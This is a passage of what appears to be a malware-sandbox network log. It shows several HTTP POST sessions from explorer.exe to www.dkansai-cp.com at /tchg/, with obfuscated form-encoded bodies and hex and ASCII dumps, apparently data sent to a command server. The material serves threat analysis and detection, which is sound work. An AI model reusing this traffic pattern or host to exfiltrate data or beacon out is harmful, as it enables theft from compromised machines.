                                                                                                                    Data Ascii: ,j-%9._;Tg<k,.X7w8~_;)wRYP9Ddiu).mswRuma`_lVOLW61oVke_$qm]UY~x?'=:-sX[J{m/W~?,;s:


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    28192.168.11.2049787183.90.238.4380C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:09:32.501301050 CEST709OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.dkansai-cp.com
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 527
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.dkansai-cp.com
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.dkansai-cp.com/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 6c 54 47 5f 69 5a 51 31 65 38 72 54 58 65 47 43 6a 41 6d 6f 5a 6f 67 52 71 32 36 45 34 5f 33 59 4f 71 48 75 41 43 39 74 75 52 33 46 4c 63 46 33 78 67 65 6d 28 76 32 45 68 32 70 79 7e 66 42 67 28 53 7e 45 6a 34 71 78 7a 4f 4f 73 59 32 57 7a 54 31 41 5f 4b 64 6e 62 4d 39 49 55 4b 67 65 30 69 59 45 75 41 51 76 41 74 5f 47 68 30 76 4f 4f 35 32 34 38 39 45 28 39 4a 77 69 47 73 6c 37 34 6d 4c 6d 47 28 41 42 67 32 34 6d 51 67 53 4f 34 4e 72 70 65 57 36 4a 6f 62 65 41 77 32 42 39 68 48 76 52 53 38 63 28 7a 46 48 64 6f 6b 49 31 6a 44 5a 50 38 34 79 37 6a 67 57 28 55 68 63 46 74 75 7a 6e 70 72 33 58 66 79 4e 30 65 49 41 6b 41 6d 66 28 35 67 6b 59 6c 6f 59 30 53 56 31 77 56 4a 62 76 30 66 78 7a 66 56 6d 4c 4e 4d 6c 64 59 44 4d 4a 7a 5a 4b 58 67 66 33 61 6f 76 2d 79 4f 65 32 78 69 78 4e 46 70 45 66 4a 61 62 70 48 76 32 4a 65 54 6f 64 6a 5f 5a 72 6f 70 50 38 42 58 35 32 38 43 7a 68 30 6d 38 65 36 38 53 4e 78 41 45 6b 66 31 70 79 75 68 57 39 72 53 47 65 78 52 70 6f 66 33 76 41 49 6f 6a 6c 35 4c 58 67 7e 78 57 62 33 74 62 47 33 6b 50 66 70 55 31 46 4d 75 54 35 51 44 4f 68 78 51 4e 32 38 37 66 71 57 50 39 6b 71 6a 65 61 78 68 31 7a 4d 4d 52 49 58 52 6a 4f 56 47 28 4a 67 6c 78 69 59 31 59 4c 34 57 49 52 32 55 38 6f 4b 6f 46 6b 72 7a 77 73 54 37 4f 77 41 55 56 76 68 46 54 41 78 79 35 72 73 54 64 42 76 66 4b 44 59 50 7a 76 77 39 58 64 28 66 30 6d 64 71 63 5a 59 63 77 47 7a 34 78 4c 47 59 77 6c 6f 48 55 68 73 74 54 64 52 63 65 32 52 59 42 39 59 5a 72 56 56 53 43 41 58 6b 50 46 41 4a 30 36 61 2d 37 37 41 6c 49 38 71 30 4a 38 36 43 4e 6f 75 76 4a 6d 34 2e 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: O0qEM=lTG_iZQ1e8rTXeGCjAmoZogRq26E4_3YOqHuAC9tuR3FLcF3xgem(v2Eh2py~fBg(S~Ej4qxzOOsY2WzT1A_KdnbM9IUKge0iYEuAQvAt_Gh0vOO52489E(9JwiGsl74mLmG(ABg24mQgSO4NrpeW6JobeAw2B9hHvRS8c(zFHdokI1jDZP84y7jgW(UhcFtuznpr3XfyN0eIAkAmf(5gkYloY0SV1wVJbv0fxzfVmLNMldYDMJzZKXgf3aov-yOe2xixNFpEfJabpHv2JeTodj_ZropP8BX528Czh0m8e68SNxAEkf1pyuhW9rSGexRpof3vAIojl5LXg~xWb3tbG3kPfpU1FMuT5QDOhxQN287fqWP9kqjeaxh1zMMRIXRjOVG(JglxiY1YL4WIR2U8oKoFkrzwsT7OwAUVvhFTAxy5rsTdBvfKDYPzvw9Xd(f0mdqcZYcwGz4xLGYwloHUhstTdRce2RYB9YZrVVSCAXkPFAJ06a-77AlI8q0J86CNouvJm4.
                                                                                                                    May 30, 2023 11:09:32.771543980 CEST710INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Tue, 30 May 2023 09:09:31 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Last-Modified: Mon, 02 Jul 2018 00:27:42 GMT
                                                                                                                    ETag: W/"afe-56ff9440f72fb"
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b 9e 96 6a 6b cb 23 d5 a8 80 72 a4 71 d8 58 34 e2 1e a8 e0 6c 8e 04 55 8f cd 5b ed 02 0a 9d 80 79 9e ca 52 c1 ce c5 5a 20 69 2e a0 a1 f1 ca d4 3b 95 29 e9 59 61 6e 5b 47 ae 02 bd 56 15 37 a8 07 ae a6 f8 53 70 b1 23 be 32 47 d0 29 42 83 36 1b 41 e6 d2 83 a5 df d1 d2 af e2 86 b8 29 ee 89 ab a0 32 4f 9d 45 b3 ef b1 a8 4e 1d f9 26 7e 13 db e2 6b b1 79 fd 91 b8 81 66 03 86 ce 8f 4b f1 71 1a 60 a8 98 a1 0f f0 c5 16 52 e6 52 0d ba 10 fb a1 15 92 80 56 15 cc 3d dc 78 d4 27 56 9d c8 fe 17 50 76 74 42 19 c5 48 43 fa 19 29 a0 a9 c9 b7 94 4c f2 6c 61 8f d6 80 58 07 a6 84 04 4a ee 30 8f 01 89 f3 75 1a 91 98 aa 6c ba 5c 15 24 37 d1 5c 48 45 9e d7 f9 2a cc 73 f7 bb f4 6b 65 3f fb 41 aa 40 49 9b 60 06 23 d6 80 46 8d f5 a5 48 68 3e 4e bc 39 12 51 07 f7 33 01 1d cd 69 98 af aa 2b e6 60 3f 96 14 35 b9 29 99 72 d1 68 be 49 24 45 44 b6 4b c4 9e 3e a4 67 54 96 bc 97 d5 51 b2 d0 f4 30 f5 75 2a 35 ba 56 c4 9a d0 b5 e6 02 0a 99 47 5d 34 54 ad ea 2e 6b 7d 42 ce 20 93 7e 52 47 27 15 ad 09 ac 71 a0 13 e1 56 c4 fa d8 86 64 ba e6 21 07 b7 42 32 a0 70 79 6c 24 29 da c0 a3 da 46 17 34 94 cf e7 e3 96 8f 6b b9 47 22 18 25 2b 6c 62 27 3e a3 00 f5 95 93 22 89 49 13 05 59 e2 b1 fb a4 c2 16 74 b8 04 7f 76 52 e3 4f 96 40 ef 78 5a 7b b9 35 ec 61 54 1a f0 18 b0 3d c4 9a 78 da b9 2d d6 c5 96 f8 52 ec 1a c6 00 33 29 42 c3 b6 f1 6e 83 b8 14 23 e6 7b 6d b9 18 08 f1 11 f6 5d f4 36 6c 30 b5 dd 60 d3 1c d4 22 bc 90 88 a6 f2 c0 e8 41 40 9f 19 aa e0 98 d1 4c a6 5b 63 dc 85 6c 3c d9 99 45 23 53 97 47 2b 93 49 8f 60 5e d2 a5 75 c0 a1 9c 8f 3e 83 7c cf 59 0e 7c 9f 2e db 75 4e 4d 57 bf 45 3c ae 71 78 d9 af 4c 46 d1 ab e6 6e 02 28 86 dc 69 38 bd 88 dd f9 48 55 a3 8e 68 bf 43 4e e3 5f 34 5e d7 05 24 1e 89 3b e2 ba d8 ed fc 2b ee 8a c7 e2 05 6c c7 f5 d7 36 e3 4d ba 31 95 3f b4 8f fa 74 81 87 7a dc ed 23 7e 32 ad 1b 44 7c b6 d7 b6 57 b2 ab f8 cf c4 9f be 02 ca f7 7a d5 37 d6 99 ae 81 06 94 74 21 39 dd 29 2c aa 4b e9 01 51 38 13 97 78 61 f4 ea 1a d4 25 39 73 7b db 9a 8c c1 a2 51 b4 e3 6f 2f 7c 83 6d 75 0d 31 8a f2 0b 07 ef 2e 9d 43 d4 2d 99 72 8a e1 5b
                                                                                                                    Data Ascii: 519VoG>{aJ%fc'qJ-Jj;wuc2SPI6MK(*&Qfg^'{})8:sgQ=jxe(ZR@?aqdN;b?k"4<R@GicE[id:ha~D|v$g|4}Q;NVaQ:qc3'OW@Rs7Y2O^ruPF{V`c#5ZD6?"!hpKZhFMUX@[jk#rqX4lU[yRZ i.;)Yan[GV7Sp#2G)B6A)2OEN&~kyfKq`RRV=x'VPvtBHC)LlaXJ0ul\$7\HE*ske?A@I`#FHh>N9Q3i+`?5)rhI$EDK>gTQ0u*5VG]4T.k}B ~RG'qVd!B2pyl$)F4kG"%+lb'>"IYtvRO@xZ{5aT=x-R3)Bn#{m]6l0`"A@L[cl<E#SG+I`^u>|Y|.uNMWE<qxLFn(i8HUhCN_4^$;+l6M1?tz#~2D|Wz7t!9),KQ8xa%9s{Qo/|mu1.C-r[
                                                                                                                    May 30, 2023 11:09:32.771611929 CEST711INData Raw: 2c cf 6a b1 9e 2d 17 25 39 f2 2e 02 9e f2 5f b1 12 c8 3b 8a 54 cb 67 ef 05 05 3c b4 6b ae 2c 2e 89 ab e2 96 58 e3 37 f9 df fc 0b be 0e bf 77 c5 13 38 8d ab fc e1 ea 15 7e 9f 5f e1 3b fc 29 bf c5 77 f9 8f 52 d7 59 02 50 39 ed df 44 8e 87 c3 b0 64
                                                                                                                    Data Ascii: ,j-%9._;Tg<k,.X7w8~_;)wRYP9Ddiu).mswRuma`_lVOLW61oVke_$qm]UY~x?'=:-sX[J{m/W~?,;s:


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    29192.168.11.2049788183.90.238.4380C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:09:35.308547974 CEST716OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.dkansai-cp.com
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 51815
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.dkansai-cp.com
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.dkansai-cp.com/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 6c 54 47 5f 69 5a 51 31 65 38 72 54 58 65 47 43 6a 41 6d 6f 5a 6f 67 52 71 32 36 45 34 5f 33 59 4f 71 48 75 41 43 39 74 75 52 28 46 4b 76 4e 33 77 48 43 6d 74 66 32 45 39 6d 70 76 7e 66 42 48 28 53 6d 49 6a 34 6d 50 7a 4d 47 73 64 77 47 7a 54 44 63 5f 50 64 6e 65 50 39 49 61 4f 67 65 47 69 59 49 45 41 51 71 39 74 4f 69 68 31 74 47 4f 7e 46 51 5f 68 45 7e 58 4a 77 69 53 39 31 36 46 6d 4c 79 77 28 46 5a 67 32 36 53 51 67 67 6d 34 4c 38 56 65 43 61 4a 72 56 2d 42 68 28 68 39 39 48 76 45 31 38 63 7e 47 46 43 6c 6f 6b 50 68 6a 52 6f 50 5f 37 53 37 6a 7e 47 28 58 71 38 4a 68 75 7a 37 78 72 30 4c 66 79 4e 63 65 48 41 6b 41 6a 37 4c 2d 32 55 5a 67 73 59 30 46 65 56 38 6e 4a 62 37 67 66 77 48 66 56 57 76 4e 57 79 42 59 43 70 70 7a 52 4b 58 69 41 6e 61 37 6b 65 79 61 65 33 42 45 78 4a 78 54 45 63 6c 61 61 4c 50 76 6d 62 6d 51 6c 74 6a 39 48 62 70 6a 64 4d 4e 4c 35 32 73 65 7a 68 30 4d 38 66 4f 38 54 35 31 41 4b 48 48 36 6a 79 75 71 63 74 72 48 50 2d 4e 62 70 6f 7a 5f 76 44 49 43 6a 6d 56 4c 4e 41 7e 78 51 34 66 71 4d 6d 33 64 58 76 70 47 37 6c 4e 32 54 35 4e 71 4f 67 6c 6d 4e 48 67 37 65 65 36 50 36 30 71 67 49 71 78 6c 37 54 4d 57 62 6f 58 52 6a 4f 52 30 28 4a 6b 6c 32 51 49 31 59 35 67 57 61 54 65 55 6e 6f 4b 6d 46 6b 72 75 77 73 66 32 4f 77 5a 7a 56 73 6f 71 54 43 64 79 35 2d 77 54 59 44 47 4a 50 7a 59 4b 33 76 78 6c 59 39 7a 78 30 69 39 79 63 5a 49 4d 6c 6e 54 34 77 4c 57 59 36 46 6f 41 53 42 73 71 53 64 52 4f 54 57 64 4d 42 35 77 76 72 57 4a 43 43 44 6e 6b 66 52 38 52 67 35 4b 45 73 61 51 5a 47 71 79 74 4f 74 32 4e 57 61 57 30 63 79 7e 30 51 6f 34 5a 53 70 75 41 62 74 56 58 7a 59 53 48 33 72 66 4a 72 33 58 6a 52 33 62 68 55 70 49 70 48 62 4b 70 43 34 77 68 73 79 4f 7a 74 65 59 65 57 46 49 30 55 71 42 6f 49 34 50 43 65 54 32 62 55 31 52 4a 37 4a 48 35 67 51 33 46 48 62 7e 6a 76 46 76 76 36 51 55 41 64 69 4e 33 43 73 7e 44 51 43 69 35 47 36 64 37 76 45 57 79 54 37 66 79 34 6f 36 65 37 35 45 63 35 30 28 36 65 74 57 59 7a 76 4c 50 59 70 57 34 32 31 68 6c 35 61 39 53 76 69 73 51 32 6e 7e 67 57 79 64 66 77 62 73 52 42 51 46 75 43 56 53 6c 39 51 79 2d 6b 42 68 35 61 63 43 34 52 47 46 45 56 39 43 56 64 4d 4e 5a 6a 68 61 37 31 47 6c 46 54 52 28 43 70 47 4c 31 36 54 63 73 6c 73 54 72 78 71 70 43 46 6d 73 7a 6e 48 39 5a 37 39 66 41 34 58 4a 43 44 46 55 57 49 64 55 5a 79 77 7a 34 72 65 53 74 4e 75 63 67 70 59 73 79 4c 66 35 61 4b 35 28 70 45 31 37 61 4a 64 47 72 42 4c 51 52 43 43 62 6d 28 38 52 45 62 47 28 4c 6f 2d 7a 70 35 42 6a 36 6b 32 35 71 7e 76 47 69 67 69 56 54 36 7a 72 45 52 30 33 31 57 70 54 66 6d 4e 6e 6f 42 39 54 38 46 58 7e 79 62 51 31 44 6b 66 53 6d 46 73 71 70 4a 73 33 5f 53 6e 38 79 4c 44 59 4e 71 66 69 64 48 75 57 6c 52 39 32 35 53 43 55 63 61 69 76 70 32 6e 51 44 57 4f 58 74 42 5a 54 2d 55 6d 49 32 76 70 6c 4c 37 4d 77 45 56 72 32 6d 67 58 76 76 54 59 33 46 6d 76 61 30 62 77 77 33 37 37 79 74 48 6d 63 67 79 4d 41 53 46 55 6e 46 59 79 62 5f 37 68 72 42 55 48 6d 79 4d 56 56 73 28 6b 37 58 65 49 31 42 51 43 4d 41 41 65 71 4e 49 62 75 5a 79 65 32 47 43 51 4e 65 7a 61 77 6e 75 64 37 68 4d 46 56 42 6c 69 63 55 56 65 6e 74 6c 37 55 47 6d 65 47 61 34 65 78 7a 37 51 37 55 51 6e 77 69 4b 4b 6f 4f 35 39 7e 36 38 61 74 77 7e 53 6d 32 56 55 51 69 58 63 4a 55 62 53 7e 34 52 4f 4c 77 37 64 6f 62 38 44 54 71 58 5a 53 4e 6c 30 44 77 4e 55 36 4a 6b 32 48 42 67 4d 4e 48 4e 42 47 37 49 74 79 4a 7e 45 67 30 46 77 69 5f 4a 4f 32 32 64 63 78 6d 41 64 50 53 32 6d 38 6f 65 45 57 34 57 73 38 2d 75 5f 6d 4e 55 34 51 4b 33 6c 36 75 6d 4a 69 75 79 44 38 55 52 73 45 45 36 64 57 53 57 57 77 49 66 79 44 71 48 49 31 72 33 39 4e 77 76 71 75 46 65 39 79 73 6f 59 37 4e 66 63 42 4f 59 49 68 38 44 65 79 30 5a 68 48 66 6a 6f 49 46 4e 56 62 57 71 76 79 33 67 56 51 62 6b 73 36 75 69 67 59 43 65 59 79 42 78 44 58 68 33 66 7a 64 63 35 46 68 4f 68 49 57 55 4d 6b 45 38 41 59 55 50 66 55 51 34 78 48 62 37 4c 77 56 50 6c 51 53 45 31 70 68 4d 38 65 5a 62 55 43 66 64 78 41 56 47 58 73 38 36 79 54 34 36 61 72 53 38 4c 69 54 4c 6d 50 61 31 79 6c 46 67 72 5a 30 31 46 69 35 55 4d 7a 72 52 32 41 55 4e 72 74 34 6e 72 50 5a 37 7a 6b 35 44 73 62 48 67
                                                                                                                    Data Ascii: O0qEM=lTG_iZQ1e8rTXeGCjAmoZogRq26E4_3YOqHuAC9tuR(FKvN3wHCmtf2E9mpv~fBH(SmIj4mPzMGsdwGzTDc_PdneP9IaOgeGiYIEAQq9tOih1tGO~FQ_hE~XJwiS916FmLyw(FZg26SQggm4L8VeCaJrV-Bh(h99HvE18c~GFClokPhjRoP_7S7j~G(Xq8Jhuz7xr0LfyNceHAkAj7L-2UZgsY0FeV8nJb7gfwHfVWvNWyBYCppzRKXiAna7keyae3BExJxTEclaaLPvmbmQltj9HbpjdMNL52sezh0M8fO8T51AKHH6jyuqctrHP-Nbpoz_vDICjmVLNA~xQ4fqMm3dXvpG7lN2T5NqOglmNHg7ee6P60qgIqxl7TMWboXRjOR0(Jkl2QI1Y5gWaTeUnoKmFkruwsf2OwZzVsoqTCdy5-wTYDGJPzYK3vxlY9zx0i9ycZIMlnT4wLWY6FoASBsqSdROTWdMB5wvrWJCCDnkfR8Rg5KEsaQZGqytOt2NWaW0cy~0Qo4ZSpuAbtVXzYSH3rfJr3XjR3bhUpIpHbKpC4whsyOzteYeWFI0UqBoI4PCeT2bU1RJ7JH5gQ3FHb~jvFvv6QUAdiN3Cs~DQCi5G6d7vEWyT7fy4o6e75Ec50(6etWYzvLPYpW421hl5a9SvisQ2n~gWydfwbsRBQFuCVSl9Qy-kBh5acC4RGFEV9CVdMNZjha71GlFTR(CpGL16TcslsTrxqpCFmsznH9Z79fA4XJCDFUWIdUZywz4reStNucgpYsyLf5aK5(pE17aJdGrBLQRCCbm(8REbG(Lo-zp5Bj6k25q~vGigiVT6zrER031WpTfmNnoB9T8FX~ybQ1DkfSmFsqpJs3_Sn8yLDYNqfidHuWlR925SCUcaivp2nQDWOXtBZT-UmI2vplL7MwEVr2mgXvvTY3Fmva0bww377ytHmcgyMASFUnFYyb_7hrBUHmyMVVs(k7XeI1BQCMAAeqNIbuZye2GCQNezawnud7hMFVBlicUVentl7UGmeGa4exz7Q7UQnwiKKoO59~68atw~Sm2VUQiXcJUbS~4ROLw7dob8DTqXZSNl0DwNU6Jk2HBgMNHNBG7ItyJ~Eg0Fwi_JO22dcxmAdPS2m8oeEW4Ws8-u_mNU4QK3l6umJiuyD8URsEE6dWSWWwIfyDqHI1r39NwvquFe9ysoY7NfcBOYIh8Dey0ZhHfjoIFNVbWqvy3gVQbks6uigYCeYyBxDXh3fzdc5FhOhIWUMkE8AYUPfUQ4xHb7LwVPlQSE1phM8eZbUCfdxAVGXs86yT46arS8LiTLmPa1ylFgrZ01Fi5UMzrR2AUNrt4nrPZ7zk5DsbHg6XNoqZRfn8gci2ZNcw9WMv8~JNkQFrTlncywDYLLHvhEqnBVfw-kMadLRdCa6Y2405wTf97Iay4zvr_KYEcVRp6TNuuOENPM-kmtTBg6L9N3Kgh(RMhpWCROuKnqaHyV7VGHplXrRpLQdX6zdfxztAfiCezpfSs2OvY76AGZJ2REyx_Qrlm02RRSYuYx4Mfl4thGl4m59hUmm9NrY6rL7FyB6afAGDo(bBpJ7iKoQ53GOg4lmnae3qD9XrhioOWQ-1g76UIKPcIJyjdmC94WnXwKArv2xYI~VhTtxFHml7R6TedrNMLfchMp7DxOxOvlmO4IIXamDQ2pVVDGNHCW3RelnRpS0YtwAE9HTSyyBABVQBh59yDipRZ2ruTWqi1dLdFiI55C8ExmDkT50wWf8dDEGiwhT76dCUtclSRtrUldyz067Iq7vc-n9qtiAZ6ZWGh~TnGswpL~1y4cGq2BpEVtJze9eTNnsnTd-yBq2vKD-CIaW6Y2KGQ4OGBc0yOM98n9BNwLmQx45fX4H3jcAspxpUx4bCpEfG-kx0GHVw-unkpT9hFAf3rDYGGK46cwVJ4RJXVEzKf3PuKn9Y7NZaBDa6TCSifiLTeuvzJTM59Kt~vWATb(c2yeApVFwNWWTdnUQu_nu5SGC4z8pdrNeevY-nI2GDk1JKqG9JnwdLcQvMYpUg4fwlPn6yqeYmY(1GQIVUpMuBkdOXVM38eHUSDDhP3OD7J8F8J5Mm6h0WGF4EqgcOGJIZWMDapHy9qyf88yqO663z6AQUcMctiAT(ttke9nZ0FEaCacepUS9JAD65oIFpiE_QNTfo03yqws5Vyj2BvdaQUjVQzr8rmSOcP4h3EDRqWG4fERBA_2YeYfmXQ~89NJ5MpAVciStFZ6_Z585Xiy252cR7WlVkE5WN0sg4Z~Zdw6F(ixTClsPW6KJtpJfR-krzXx9~tnyLFg1bLUoRnLLPENgEoZjY-avLiOkvyV1DsmlfLzP~-h7AdiICyVf0jmo~131255v4_3f6Qbc7T4pqgYE2Soe4Ah4uAoVpzdBphcvG1~Adwme9Ck2xnF8fuXVT-zE3Nhn4Um2tJz6rjaLLjuyUQXeKl0z(ANifMN9ydNff0OzIm9WTHchKgLkgKWO68JrQAhDKuZMEXs0GFxhfDqZeeNqVeBvxddUq9HbIgRLaxnwFoISmhO15VEX(RT23WFCWimWETiovJKttHnZak~_geBPHHjx594JAmqOol4l0ovx(BFIl2Yq8MqTRCKbvg9w91EDskTVhcxwtzUTtJyxiBFJvyBBUje0Yk1anxGEW6uweTMFgFRT(2n8hAOEQEQgwXoxd7quHmDuYBZ6zEmZVN0w~8oXimHXxq0atRYTh_JoZLMvYOGAWpPk(cJ3E8kEaGUIkGy3I3p2W4YGPAxhb3YUyHVAIPdzc_92PHtsMfABC9tcC18pAFfFtTsoQwUQUbcBa0XxkLGrCsYj1wlXXYS5PyTXji4oruKmwX4a8YD4aH~FCiEK4DPbULxQNAFFPsddYfQvFQlQdENzwCXM2586gXmHjSsaXt1-qW~hyP33w-8VOBiZSvKc66rthAky~QYlMUc-~iVy2syaoeLsx8pqj6~LmnodiESoqqPhbpkyu4elG_RbhdCdafvDrH4QqdH7THZGFAgSJ7BQ1gdwrj94WifI1tUw9syiax8sD5GBbMHlMf2bMLlfC64ycE9ksPaPTvg4PiUZJ609LpsJRDwAQqvJB0RC2pn47vf0XVZzVfAuekhaYLjGzms-C2Z2UFqSCETPemStSi8xUPlv33niw0NBtnDvL8bHiL7HGmofTC4aQcUW1bruY8o18DuWU5y9zh(M3qihSDhrWfflHHP0pqZ5zJlDwXIhZtL-MtCHaZWOKxf4Ho6CXHURsYjYkaqQUbBYCLZ5nqqZF_HgBFwXkmnm27NxCnhI1pOXOj0v(zBUQLR7RXu2~Ssnwcg-VP3iQ6G-NWACrYwWO-7ihbOcdhkPpvyCbfjrBu8bujmqyie02Umph1BtstWWh021SSzvpPN3APPRfH4TAVJ0pXNg6znD(ojuleShdPr49jcmAtokLYwpk9wcT6ckjCycfOGL5B18~ZwPEJlaARIAvlNf3Tm9y1VMJLOYuumghccdlalBy9G4NG1c47hPFxvV1eBOImTRmDfpqeErbNGYHh~cS2AdkIzejnPdMxkwIMKKwTIpFNGxYoRCp_sWTo8rtSHzPj2fQI~c(8V15NWoHueMF8oqHmh4~PamoswwAqoaYWEJGqK5ibCug9W_gO03I28qLRAdqrWgFRyAMZvl8pEPpTIUZK5etObv5xDVoeiOUFt1(EhU294gKUHe5UDNOy4SRvHp7YHBQHC8yjnS6roPQySuAH(VoxTKV9733Rp7xvJMBEqzZlPUEUoS2kjgiUb9XH3fgPCYOyCARZLGa5iNsCJsWdJwvmyUmR0J4iBpBAEkAEFWRT09Jz1TqPrpcgqhSmLMczwrUHJEXk6DN0WAqylxIJMHJq6HrNo0zJR3C5HGVLfNpn~6PZD0z6nlC_SOdhYuKTWweNK5rHWasrDYMuD8LDLmKOLOITowEH1jdoRXFtgxHyeIQBUheOnaZydmEehDBc(89PB_VSuBmGVi9aW_APaEjuzs8Aq9sOBiyI~qTaWGJ5bFzfg20amFS6tyFgLOUlMAa4cuZmX4sQwwWpoCl4woWFBwqxQVVi
                                                                                                                    May 30, 2023 11:09:35.308645964 CEST724OUTData Raw: 38 34 78 4c 62 5f 72 65 57 6e 62 33 4b 69 70 79 47 51 69 6f 72 75 64 54 68 6e 43 42 69 2d 52 65 30 6e 4a 68 6c 4d 4f 4c 76 66 45 68 6f 34 55 52 4f 58 63 61 61 7a 4a 61 4c 54 73 56 59 6e 33 5a 36 42 4c 62 6c 5f 64 74 69 76 48 4c 56 78 30 79 56 32
                                                                                                                    Data Ascii: 84xLb_reWnb3KipyGQiorudThnCBi-Re0nJhlMOLvfEho4UROXcaazJaLTsVYn3Z6BLbl_dtivHLVx0yV2VugWC7~9T8cc0dwhTUqM66DxVwglrzsK6Zbr7cGk4NSqHsODus9UWd3_0Xkxn9aGL5EE4YgsBBrCx7qDmsxxFc(U11UnCEIZlVwExTPU(HkV7PKqK93NnQa9URjA82Vb4lM15_8qvHscfJk6P3JkcY2HpWk52i~8N
                                                                                                                    May 30, 2023 11:09:35.587405920 CEST725OUTData Raw: 7a 74 6a 5f 55 68 75 35 43 39 32 71 71 30 7a 6b 38 5a 63 58 4e 72 33 35 49 73 36 76 64 4e 61 53 77 39 32 6b 64 5a 55 2d 34 4b 65 70 6d 6c 36 50 67 38 64 44 30 4e 51 74 68 4a 49 36 48 48 74 57 69 6c 45 78 6c 71 6f 63 75 4d 4b 42 33 30 66 4d 6d 6e
                                                                                                                    Data Ascii: ztj_Uhu5C92qq0zk8ZcXNr35Is6vdNaSw92kdZU-4Kepml6Pg8dD0NQthJI6HHtWilExlqocuMKB30fMmno_gYSpHp4N7DiFJ0rUvMehYiB0YPcDCLM5(JatQmBnxjphsmnNUpRe46AEUEDs2cO5xQVZwRpJzoyaSjWvz_L46EtAk4s0IhTr8ssSK066drgAccnhdPQrD-CIY4SpfnZyUh~2deLBwbDI1KdSE0(WPlKd~rNaTxZ
                                                                                                                    May 30, 2023 11:09:35.587465048 CEST728OUTData Raw: 38 38 65 5f 36 46 32 72 45 70 64 41 28 7a 56 61 44 67 64 55 64 65 48 4f 6b 4c 4f 6e 4e 65 6b 49 6f 79 57 2d 71 74 39 66 6d 48 50 4a 68 31 4b 67 73 39 50 46 6c 6e 70 5a 6e 54 4f 63 53 77 67 4e 4f 5a 30 72 6c 76 5a 5f 58 4f 74 48 28 78 75 56 70 5f
                                                                                                                    Data Ascii: 88e_6F2rEpdA(zVaDgdUdeHOkLOnNekIoyW-qt9fmHPJh1Kgs9PFlnpZnTOcSwgNOZ0rlvZ_XOtH(xuVp_LOEJt5YuWu7EZxGQPyGX~zlQU85GAdNupCD5eeL01IetlruoUnNJlzDVuqihPdkdZhO3PMEp7N8EXu0xfmzP6mzmIiOx1r7huH99BnoZjFGtMlfUhCbOXVfIVi~I2MHfM5~YfL6Kfk68LDMH~HVf0su2AfXka9GLS
                                                                                                                    May 30, 2023 11:09:35.587501049 CEST732OUTData Raw: 48 30 4e 32 58 73 57 7a 58 47 65 37 46 74 39 59 68 38 7a 51 77 75 57 79 65 6d 41 77 72 41 51 38 55 51 34 6f 6d 68 35 51 72 75 54 76 44 57 34 48 45 6d 75 4d 37 5a 52 4d 56 2d 42 72 33 38 4c 55 69 69 38 63 31 61 35 33 49 58 38 31 57 30 35 68 78 6e
